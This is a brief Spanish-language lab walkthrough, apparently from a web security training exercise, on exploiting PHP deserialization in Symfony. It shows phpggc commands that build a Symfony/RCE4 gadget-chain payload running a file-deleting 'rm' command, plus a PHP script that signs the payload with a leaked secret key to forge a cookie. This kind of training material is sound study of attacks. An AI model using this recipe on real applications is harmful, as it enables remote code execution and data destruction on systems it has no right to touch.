6 - Exploiting PHP deserialization with a pre-built gadget chain

Se Likea el framework PHP que se está usando en un comentario de un developer :

/cgi-bin/phpinfo.php

Se likea la versión del framework usado, generando un error en la cookie :

./phpggc -l symfony

Usaremos la versión 4 :

Symfony/RCE4     3.4.0-34, 4.2.0-11, 4.3.0-7                             RCE: Function Call    __destruct      *

./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0

Lo pasamos por este script que nos crea la firma y nos url encodea el objeto :

<?php
$object = "OBJECT-GENERATED-BY-PHPGGC";
$secretKey = "LEAKED-SECRET-KEY-FROM-PHPINFO.PHP";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;